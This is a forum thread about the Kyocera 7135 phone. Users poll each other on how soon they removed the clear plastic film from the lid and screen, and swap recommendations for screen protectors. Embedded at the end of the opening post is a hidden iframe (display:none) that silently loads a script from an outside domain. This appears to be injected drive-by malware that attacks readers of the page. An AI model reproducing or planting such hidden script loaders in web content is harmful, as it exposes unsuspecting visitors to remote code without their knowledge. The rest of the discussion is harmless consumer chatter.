Poll: When did you remove the outside clingy plastic on the lid of your 7135?

+ Reply to Thread

Keeping the Plastic -- How Long

The plastic on the front of the case -- how long did your keep it on before getting sick of the bubble around the raised "Kyocera" logo?

My first GC/Alltel model came off in a couple of days and I'm holding out longer on the Verizon version. It could be the ugly Verizon logo that I'm afraid might get uglier. Not sure.

Yes, this is another dumb poll but what the heck!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Mine came off right away, but just as quickly I tried to put a strong engineering protector in. Took a few tries before I figured out how to get them on smooth though.

Alan

GONE

I can't stand any stickers or vinyl "protectors" on any of my gear.
    I really have to control myself to keep from peeling stuff off of other people's laptops and digital equipment!

Originally posted by alanb
    Mine came off right away, but just as quickly I tried to put a strong engineering protector in. Took a few tries before I figured out how to get them on smooth though.

Alan
    You put a protector on the outside? Hmmmm. Never thought of putting a protector on anywhere but the screen and graffiti area. So you also trimmed it to fit the "v" shape? Sounds like a mechandising oppty for someone.

Originally posted by Beryl
    You put a protector on the outside? Hmmmm. Never thought of putting a protector on anywhere but the screen and graffiti area. So you also trimmed it to fit the "v" shape? Sounds like a mechandising oppty for someone.
    I think Alan's thinking that you were talking about the rubbery plastic silk screen protector. I left that on myself until I put a SE screen protector on. The plastic on the outside of the flip, that I took off within a day... because my leather case came in the next day and covers that part of the 7135 anyway
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Robert K.
    I think Alan's thinking that you were talking about the rubbery plastic silk screen protector. I left that on myself until I put a SE screen protector on. The plastic on the outside of the flip, that I took off within a day... because my leather case came in the next day and covers that part of the 7135 anyway
    Yeah, what he said. eyes bleary from this head cold, can't read straight....

Alan

AJR
    I keep looking at the protector over the Kyocera/Verizon logo. I got the phone yesterday (Tuesday), didn't get home till late to play and setup the Palm Apps, then this morning (Wednesday) called Verizon and transferred to the 7135. I've found myself looking and playing with the "bubble" (running my fingers around it. Don't know if I'll remove it or not!

As for the silky plastic screen protector... I was going to leave it on until I got my 7135 screen protectors in the mail. I got home tonight and there they were... so off it came, and on went the actual protector!

Originally posted by AJR

As for the silky plastic screen protector... I was going to leave it on until I got my 7135 screen protectors in the mail. I got home tonight and there they were... so off it came, and on went the actual protector!
    And WHERE do you get the 7135 screen protectors from???

Dagi

AJR
    Originally posted by Dagi
    Why, eBay of course! The ones I got weren't CompanionLink protectors. I can't remember the name of them, but they seem pretty good. I'm sure I could have put it on a little tighter, but at least the screen is protected!

Originally posted by Dagi

Dagi
    Most people here prefer the Strong Engineering screen protectors.

Yeah, the Strong Engineering ones are BY FAR the best.
    ~'kito
    pdaPhoneHome Moderator

Re: GONE

Originally posted by tripm
    I can't stand any stickers or vinyl "protectors" on any of my gear.
    I really have to control myself to keep from peeling stuff off of other people's laptops and digital equipment!
    LOL! My husband does this too, all the time. I always have to make him stop peeling protectors off my equipment, because I'm one of those people who leaves the protector thingies on for years....

However, somehow, in the case of my phone, the outside is just so beautiful, I couldn't stand anything over it....

tC,
    I suppose your couches have that crunchy, clear plastic on them, don't they? Not much fun when you wear shorts.
    ~'kito
    pdaPhoneHome Moderator

About two months... I was too cheap/busy to pick up some screen protectors after I got my phone. So I trimed the included protectors to fit the Grafitti and screen area. That little excersize which I figure was only 50% successful prompted me to get some precut protectors from Strong Engineering when those wore out. So far they are working as advertised.
    mg

Didn't know it was there

Heck, I didn't know there was plastic on the cover! I thought it looked stranged but didn't worry about it. My wife (She would notices everything) saw and said, that looks terrible and took it off.

-- John:alieneyes

Glad this thread somehow floated back up to the surface, because I got a replacement 7135 about 5 weeks ago and I still haven't taken the clear plastic film off of the screen. I keep waiting until I find my StrongEngineering protectors. Heck I used the first SE protector for the past 9 months!
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Heck I used the first SE protector for the past 9 months!
    I'm still on my first SE protector (over 9 months myself). But it's not that I haven't wanted to changed it... I've just been dreading it because of how long it took to get this one on perfectly!

Johnathen Lieber
    On my first phone I kept it on until it started to curl by itself. The replacement phone I just go had the plastic removed by the tech lady who removed it from the box (only exchanged the phone nothing else).